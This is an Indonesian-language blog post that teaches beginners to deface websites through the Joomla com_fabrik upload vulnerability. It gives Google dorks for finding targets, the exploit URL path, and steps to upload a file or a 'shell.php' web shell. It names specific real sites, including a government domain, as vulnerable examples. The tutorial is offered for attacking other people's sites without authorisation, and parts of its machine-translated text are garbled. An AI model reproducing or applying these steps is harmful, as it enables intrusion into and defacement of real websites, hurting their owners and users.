Cara Deface Dengan Com_fabrik Upload Vulnerability

Cara Deface Dengan Com_fabrik Upload Vulnerability

2:24 AM


Sore ini saya akan membagikan trik deface termudahdan bisa di gunakan oleh para newbie seperti saya ini, okelah ga usah banyak bacot hehehe..... Mari pergi ke KTP ehh TKP maksutnya :v
 
Dork:

inurl:? Index.php option = com_fabrik

atau index.php option = com_fabrik?

Eksploitasi: /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

1.Paste yang salah dork di www.google.com.

Jika Anda ingin mempersempit pencarian untuk domain .com atau domain .com.au kemudian hanya menambahkan "site: com.au" di atas google dork.

Contoh: inurl:

index.php option = com_fabrik situs:? Com.au

(ini akan serach untuk kerentanan com_fabrik untuk website .com.au) Pemanfaatan Sasaran 1. Setelah Anda memiliki daftar situs, pilih situs web apapun dan mengganti menempatkan mengeksploitasi di belakang situs. Contoh:

Dari http://www.scb.travel/index.php?option=com_fabrik&view=table&tableid=9&calculations=0&Itemid=85 Untuk
http://www.scb.travel/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

2. Kemudian, Anda akan mendapatkan sesuatu seperti ini.


3. Sekarang upload file untuk meng-upload seperti picture.jpg atau shell.php

Setelah file Anda berhasil upload , Anda perlu menambahkan /media/yourfilename.jpg untuk melihat file Anda . contoh :
http://www.scb.travel/media/blackcyberseccrew.jpg

4. Contoh dari situs rentan ,

http://prdbihar.gov.in/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1 http://bluejaylodgecostarica.com/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0 5. Anda juga dapat meng-upload shell Anda ke situs :) 

About

This is dummy text. It is not meant to be read. Accordingly, it is difficult to figure out when to end it. But then, this is dummy text. It is not meant to be read. Period.

Next
« Prev Post
Previous
Next Post »
Post a Comment
Thanks for your comment
Subscribe to: Post Comments (Atom)